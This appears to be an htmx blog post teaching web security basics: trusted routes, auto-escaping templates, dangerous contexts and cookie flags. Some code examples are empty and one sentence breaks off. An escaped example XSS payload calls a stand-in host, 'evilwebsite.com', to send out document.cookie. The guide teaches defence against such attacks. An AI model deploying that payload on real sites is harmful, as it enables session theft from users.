+++
title = "Web Security Basics (with htmx)"
date = 2024-02-06
[taxonomies]
author = ["Alexander Petros"]
tag = ["posts"]
+++

As htmx has gotten more popular, it's reached communities who have never written server-generated HTML before. Dynamic HTML templating was, and still is, the standard way to use many popular web frameworks (like Rails, Django, and Spring), but it is a novel concept for those coming from Single-Page Application (SPA) frameworks (like React and Svelte), where the prevalence of JSX means you never write HTML directly.

But have no fear! Writing web applications with HTML templates involves a slightly different security model, but it's no harder than securing a JSX-based application, and in some ways it's a lot easier.

## Who is this guide for?

These are web security basics with htmx, but they're (mostly) not htmx-specific; these concepts are important to know if you're putting *any* dynamic, user-generated content on the web.

For this guide, you should already have a basic grasp of the semantics of the web, and be familiar with how to write a backend server (in any language). For instance, you should know not to create `GET` routes that can alter the backend state. We also assume that you're not doing anything super fancy, like making a website that hosts other people's websites. If you're doing anything like that, the security concepts you need to be aware of far exceed the scope of this guide.

We make these simplifying assumptions in order to target the widest possible audience, without including distracting information. Obviously this can't catch everyone. No security guide is perfectly comprehensive. If you feel there's a mistake, or an obvious gotcha that we should have mentioned, please reach out and we'll update it.

## The Golden Rules

Follow these four simple rules, and you'll be following client security best practices:

1. Only call routes you control
2. Always use an auto-escaping template engine
3. Only serve user-generated content inside HTML tags
4. If you have authentication cookies, set them with `Secure`, `HttpOnly`, and `SameSite=Lax`

In the following section, I'll discuss what each of these rules does, and what kinds of attacks they protect against. The vast majority of htmx users (those using htmx to build a website that allows users to log in, view some data, and update that data) should never have any reason to break them.

Later on I will discuss how to break some of these rules. Many useful applications can be built under these constraints, but if you do need more advanced behavior, you'll be doing so with the full knowledge that you're increasing the conceptual burden of securing your application. And you'll have learned a lot about web security in the process.

## Understanding the Rules

### Only call routes you control

This is the most basic one, and the most important: **do not call untrusted routes with htmx.**

In practice, this means you should only use relative URLs. This is fine:

```html
```

But this is not:

```html
```

The reason for this is simple: htmx inserts the response from that route directly into the user's page. If the response has a malicious `

Fortunately this one is so easy to fix that you can write the code yourself. Whenever you insert untrusted (i.e. user-provided) data, you just have to replace eight characters with their non-code equivalents. This is an example using JavaScript:

```js
/**
 * Replace any characters that could be used to inject a malicious script in an HTML context.
 */
export function escapeHtmlText (value) {
  const stringValue = value.toString()
  const entityMap = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
    '/': '&#x2F;',
    '`': '&#x60;',
    '=': '&#x3D;'
  }

  // Match any of the characters inside /[ ... ]/
  const regex = /[&<>"'`=/]/g
  return stringValue.replace(regex, match => entityMap[match])
}
```

This tiny JS function replaces `<` with `&lt;`, `"` with `&quot;`, and so on. These characters will still render properly as `<` and `"` when they're used in the text, but can't be interpreted as code constructs. The previous malicious bio will now be converted into the following HTML:

```html
&lt;script&gt;
  fetch(&#39;evilwebsite.com&#39;, { method: &#39;POST&#39;, data: document.cookie })
&lt;&#x2F;script&gt;
```

which displays harmlessly as text.

Fortunately, as established above, you don't have to do your escaping manually; I just wanted to demonstrate how simple these concepts are. Every template engine has an auto-escaping feature, and you're going to want to use a template engine anyway. Just make sure that escaping is enabled, and send all your HTML through it.

### Only serve user-generated content inside HTML tags

This is an addendum to the template engine rule, but it's important enough to call out on its own. Do not allow your users to define arbitrary CSS or JS content, even with your auto-escaping template engine.

```html
```

And don't use user-defined attributes or tag names either:

```html
<{{ user.tag }}>{{ user.tag }}> {{ user.name }}
```

CSS, JavaScript, and HTML attributes are ["dangerous contexts,"](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#dangerous-contexts) places where it's not safe to allow arbitrary user input, even if it's escaped. Escaping will protect you from some vulnerabilities here, but not all of them; the vulnerabilities are varied enough that it's safest to default to not doing *any* of these.

Inserting user-generated text directly into a script tag should never be necessary, but there *are* some situations where you might let users customize their CSS or customize HTML attributes. Handling those properly will be discussed below.

### Secure your cookies

The best way to do authentication with htmx is using cookies. And because htmx encourages interactivity primarily through first-party HTML APIs, it is usually trivial to enable the browser's best cookie security features.
These three in particular:

* `Secure` - only send the cookie via HTTPS, never HTTP
* `HttpOnly` - don't make the cookie available to JavaScript via `document.cookie`
* `SameSite=Lax` - don't allow other sites to use your cookie to make requests, unless it's just a plain link

To understand what these protect you against, let's go over the basics. If you come from JavaScript SPAs, where it's common to authenticate using the `Authorization` header, you might not be familiar with how cookies work. Fortunately they're very simple. (Please note: this is not an "authentication with htmx" tutorial, just an overview of cookie tokens generally)

If your users log in with a `